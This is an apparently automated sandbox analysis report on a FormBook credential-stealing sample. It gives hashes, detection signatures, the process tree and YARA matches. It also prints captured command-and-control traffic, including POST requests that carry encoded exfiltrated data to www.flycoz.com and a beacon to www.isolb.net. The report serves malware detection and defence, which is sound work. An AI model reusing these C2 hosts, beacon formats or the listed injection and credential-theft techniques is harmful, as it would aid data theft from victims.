Loading ...

Play interactive tourEdit tour

Analysis Report druS9vVaUK.exe

Overview

General Information

Sample Name:druS9vVaUK.exe
MD5:e2a5e6e8c1448dfcaf7ae95dff95ade9
SHA1:33c1ff8589faf0c2469a33131fcdffb01547dab0
SHA256:8e0003e4f6d537153e60ac5129859a33b57b3b9a36b7d2be62273a6b3a8d5f3f

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • druS9vVaUK.exe (PID: 1320 cmdline: 'C:\Users\user\Desktop\druS9vVaUK.exe' MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
    • druS9vVaUK.exe (PID: 3876 cmdline: {path} MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
      • explorer.exe (PID: 3024 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • NETSTAT.EXE (PID: 4988 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 476 cmdline: /c del 'C:\Users\user\Desktop\druS9vVaUK.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • axh0nv7nt03do.exe (PID: 1200 cmdline: 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe' MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x157b9:$sqlite3step: 68 34 1C 7B E1
    • 0x158cc:$sqlite3step: 68 34 1C 7B E1
    • 0x157e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1590d:$sqlite3text: 68 38 2A 90 C5
    • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x157b9:$sqlite3step: 68 34 1C 7B E1
      • 0x158cc:$sqlite3step: 68 34 1C 7B E1
      • 0x157e8:$sqlite3text: 68 38 2A 90 C5
      • 0x1590d:$sqlite3text: 68 38 2A 90 C5
      • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.druS9vVaUK.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.druS9vVaUK.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x149b9:$sqlite3step: 68 34 1C 7B E1
        • 0x14acc:$sqlite3step: 68 34 1C 7B E1
        • 0x149e8:$sqlite3text: 68 38 2A 90 C5
        • 0x14b0d:$sqlite3text: 68 38 2A 90 C5
        • 0x149fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x14b23:$sqlite3blob: 68 53 D8 7F 8C
        2.2.druS9vVaUK.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x11d35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x11821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x11e37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x11faf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x10a9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x170a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x180aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.druS9vVaUK.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.druS9vVaUK.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x157b9:$sqlite3step: 68 34 1C 7B E1
          • 0x158cc:$sqlite3step: 68 34 1C 7B E1
          • 0x157e8:$sqlite3text: 68 38 2A 90 C5
          • 0x1590d:$sqlite3text: 68 38 2A 90 C5
          • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.flycoz.comVirustotal: Detection: 8%Perma Link
          Source: http://www.flycoz.com/te/Virustotal: Detection: 9%Perma Link
          Source: http://www.flycoz.comVirustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exeVirustotal: Detection: 33%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exeReversingLabs: Detection: 35%
          Multi AV Scanner detection for submitted fileShow sources
          Source: druS9vVaUK.exeVirustotal: Detection: 33%Perma Link
          Source: druS9vVaUK.exeReversingLabs: Detection: 35%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: druS9vVaUK.exeJoe Sandbox ML: detected
          Source: 2.2.druS9vVaUK.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 4x nop then pop edi2_2_00415092
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 4x nop then pop ebx2_2_004053FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx5_2_032A53FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi5_2_032B5092
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi5_2_032B40D2

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT&U2M=LHELWH HTTP/1.1Host: www.isolb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /te/?1bm41T=M2ouDOe6+0eFywnoUebsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuNOu64F6TRgF&U2M=LHELWH HTTP/1.1Host: www.flycoz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.99.64.55 209.99.64.55
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg).
          Source: global trafficHTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 146192Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 70 43 39 31 51 28 33 6a 7a 7a 76 48 4f 57 6e 39 59 7e 74 64 53 31 43 43 71 37 75 65 6c 67 71 6a 4d 54 33 72 72 68 41 6e 71 57 35 57 70 6b 58 71 46 51 46 35 38 43 7a 32 4a 31 65 51 57 4d 47 47 6c 34 31 38 4a 7a 4a 58 4e 6c 30 56 41 52 61 7a 38 44 46 43 38 30 75 57 4a 32 66 48 6d 38 69 33 52 57 35 59 6e 54 71 69 46 38 51 54 39 39 79 56 55 37 79 42 63 67 77 6b 35 32 4f 4b 4e 6d 46 31 2d 30 34 76 64 6d 49 48 2d 6d 5a 44 45 59 61 71 7a 6c 37 35 50 42 69 6e 74 66 70 6a 30 28 75 4b 76 77 50 65 45 67 6d 55 61 42 2d 74 51 57 6d 75 35 67 52 6d 6f 50 6c 37 57 70 49 42 52 64 64 31 6f 30 70 59 66 57 58 4b 61 30 38 7e 37 45 44 46 59 33 48 52 4f 58 75 73 69 47 50 30 73 44 71 50 55 48 67 4b 46 44 4b 66 71 79 32 5a 54 41 53 41 38 46 6e 6b 6d 36 41 6c 33 67 36 49 4a 77 35 35 6d 63 71 62 2d 50 4c 56 69 70 50 41 42 65 70 47 47 68 6d 42 75 57 7a 44 79 75 6c 65 55 41 51 32 41 73 36 58 57 45 71 35 69 35 6e 74 7a 50 49 71 76 36 77 69 32 69 50 30 59 53 6f 6f 67 70 4e 62 62 31 53 55 5f 37 4e 31 74 66 32 6e 55 4a 53 50 75 51 37 4a 4b 58 32 71 4f 5a 73 38 63 68 37 62 34 4b 58 6d 68 4f 61 57 6b 7a 68 70 52 45 66 28 58 54 56 58 5f 74 6a 64 56 54 35 73 57 62 78 71 31 6a 6d 77 49 6c 71 34 41 34 6b 79 65 6a 66 43 56 43 78 78 31 62 4e 6d 31 42 7a 52 59 30 4d 4c 55 37 45 42 61 70 65 4c 4c 57 42 67 67 63 7a 6e 4d 78 43 78 76 57 59 79 68 6c 74 41 6c 62 50 44 38 56 77 6b 6f 6e 56 51 69 37 6e 68 42 55 4d 4d 2d 33 56 53 2d 41 4e 68 64 65 53 30 53 55 79 6d 61 71 61 35 30 74 79 65 66 35 7a 46 6e 42 48 56 73 68 45 6a 57 31 51 6f 68 6c 75 7a 59 5a 59 33 71 6c 67 67 51 36 35 63 4b 79 64 4a 58 34 37 61 72 58 41 73 2d 6d 38 28 33 31 42 78 43 30 74 35 34 6a 6c 31 56 34 33 34 7a 4b 39 56 78 34 65 55 68 5a 52 6d 4d 64 61 67 6c 4b 49 47 56 6f 5f 33 64 47 4c 42 75 66 51 67 49 63 72 45 44 42 38 44 68 6e 63 4f 59 67 67 44 4c 4d 73 4f 36 78 37 5a 33 76 6e 6c 4b 56 4f 34 49 54 52 71 38 6a 74 34 30 57 68 43 69 74 41 36 6b 46 50 59 5a 4f 2d 64 32 49 36 39 6f 46 65 37 4d 77 67 46 37 4c 4d 42 74 53 4a 62 65 4f 37 45 6d 41 38 28 64 28 68 63 5f 4c 4d 6c 77 34 45 32 63 63 6c 4c 33 66 41 50 44 39 66 77 62 6c 62 56 58 31 51 4b 58 76 5a 6a 47 76 4f 7e 79 72 32 66 35 6e 48 43 5f 39 73 33 6c 71 44 39 66 6e 42 49 45 4b 78 70 36 6c 32 31 6e 50 73 48 6c 39 78 70 73 28 41 6f 6b 61 6f 66 54 6c 36 61 32 7e 30 7a 72 70 63 71 4a 50 41 42 55 33 44 4f 52 6e 73 58 39 65 6a 76 54 62 76 44 55 67 6c 45 34 6e 72 6e 31 48 72 4c 74 75 61 56 57 36 4e 77 78 66 71 47 52 28 4d 68 4e 66 57 35 78 67 6c 4a 53 72 77 7e 4e 39 78 38 35 28 6a 54 58 66 46 41 45 52 43 42 75 65 58 6e 50 35 64 51 77 6a 41 77 39 6e 36 4c 32
          Source: global trafficHTTP traffic detected: GET /te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT&U2M=LHELWH HTTP/1.1Host: www.isolb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /te/?1bm41T=M2ouDOe6+0eFywnoUebsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuNOu64F6TRgF&U2M=LHELWH HTTP/1.1Host: www.flycoz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.qdbfqfphjidqgtbttnq.com
          Source: unknownHTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jun 2020 16:04:43 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 326Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: druS9vVaUK.exe, 00000000.00000003.423050630.000000000101C000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipF
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.2
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: explorer.exe, 00000003.00000000.457087223.00000000034B0000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
          Source: NETSTAT.EXE, 00000005.00000003.770046562.0000000000247000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico11d
